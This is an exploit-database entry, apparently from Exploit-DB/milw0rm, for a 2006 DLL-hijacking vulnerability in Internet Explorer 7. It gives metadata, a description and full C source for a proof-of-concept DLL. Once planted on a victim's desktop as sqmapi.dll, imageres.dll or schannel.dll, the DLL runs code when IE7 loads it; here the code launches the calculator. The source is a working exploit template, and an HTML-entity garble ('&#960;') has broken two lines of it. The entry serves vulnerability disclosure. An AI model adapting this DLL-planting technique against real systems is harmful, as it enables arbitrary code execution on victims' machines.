IE7 Calculator Popup

vendor:

Internet Explorer

by:

Aviv Raff

7,2

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Internet Explorer

Affected Version From: IE7

Affected Version To: IE7

Patch Exists: YES

Related CWE: N/A

CPE: a:microsoft:internet_explorer:7.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2006

This exploit allows an attacker to execute arbitrary code on a vulnerable system by hijacking a legitimate DLL file. The attacker must upload a malicious DLL file to the victim's desktop as one of the following hidden DLL files: sqmapi.dll, imageres.dll, or schannel.dll. When the victim runs IE7, the malicious DLL will be loaded and the attacker's code will be executed. This exploit was tested on Windows XP SP2 with fully patched IE7.

Mitigation:

Ensure that all DLL files are legitimate and up-to-date.

Source

Exploit-DB raw data:

/*
        Copyright (C) 2006-2007 Aviv Raff
        http://aviv.raffon.net
        Greetz: hdm, L.M.H, str0ke, SkyLined

        Compile and upload to the victim's desktop as one of the following hidden DLL files:
        - sqmapi.dll
        - imageres.dll
        - schannel.dll

        Run IE7 and watch the nice calculators pop up.
        Filter fdwReason to execute only once.

        Tested on WinXP SP2 with fully patched IE7.
        For testing/educational purpose only!

*/


#include <windows.h>

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    TCHAR windir[_MAX_PATH];
    TCHAR cmd[ _MAX_PATH ];
    GetEnvironmentVariable("WINDIR",windir,_MAX_PATH );
    wsprintf(cmd,"%s\\system32\\calc.exe",windir);
    ZeroMemory(&si,sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&#960;,sizeof(pi));
    CreateProcess(NULL,cmd,NULL,NULL,FALSE,0,NULL,NULL,&si,&#960;);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return TRUE;
}

// milw0rm.com [2006-12-14]